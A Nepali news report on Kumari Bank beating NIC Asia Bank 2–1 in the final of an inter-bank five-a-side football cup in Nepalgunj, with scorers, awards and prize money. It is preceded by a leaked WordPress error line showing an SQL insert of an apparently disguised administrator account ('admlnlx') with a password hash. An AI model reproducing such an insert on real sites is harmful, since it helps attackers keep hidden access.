WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtEYWUrFwzSQTRQjQO9jd1Vo1tuNXe/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 13:26:30', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ २२–
छैटौँ अन्तराल कप अन्तर बैंक फाइव–ए–साइड फुटबल प्रतियोगिताको उपाधि कुमारी बैंकले जितेको छ ।
प्रतियोगिताअन्तर्गत आज स्थानीय रङ्गशालामा भएको फाइनल खेलमा कुमारी बैंकले एनआइसी एसिया बैंकलाई २–१ गोल अन्तरले पराजित गर्दै उपाधि सुनिश्चित गरेको हो ।
कुमारी बैंकका लागि बालकृष्ण चौधरी र रिसबहादुर थापाले गोल गरेका थिए । यस्तै एनआइसी एसिया बैंकका लागि एक मात्र गोल खुमबहादुर कार्कीले गरेका थिए । उपाधिसँगै कुमारी बैंकले रु १५ हजार र ट्रफि तथा उपविजेता एनआइसी एसिया बैंकले रु ५ हजार र ट्रफी प्राप्त गरेको छ ।
कुमारी बैंकका बालकृष्ण चौधरीे प्रतियोगिताका सर्वोत्कृष्ट खेलाडी, एनआइसी एसियाका रवि श्रेष्ठ उत्कृष्ट गोलरक्षक, सर्वाधिक गोलकर्ता सिद्धार्थ बैंकका सन्तोष लम्साल तथा अनुशासित टिम नविल बैंक घोषित भयो ।
अन्तरालका सञ्चार संयोजक लक्ष्मी चौधरीका अनुसार पुरस्कृत खेलाडी तथा टिमलाई प्रमुख जिल्ला अधिकारी रविलाल पन्थ, सशस्त्र प्रहरी बल सीमा सुरक्षा कार्यालयका प्रमुख प्रहरी उपरीक्षक राजु अधिकारी, मध्यपश्चिम क्षेत्रीय खेलकुद विकास समितिका अध्यक्ष भीम वली, अखिल नेपाल फुटवल सङ्घ (एन्फा)का केन्द्रीय सदस्य प्रदेशसिंह राठौर, भेरी प्राविधिक शिक्षालयका प्रमुख भिमकान्त लामिछाने, आयोजक अन्तरालका प्रमुख कार्यकारी जयनारायण शाहले पुरस्कार, ट्रफी वितरण गर्नु भएको थियो ।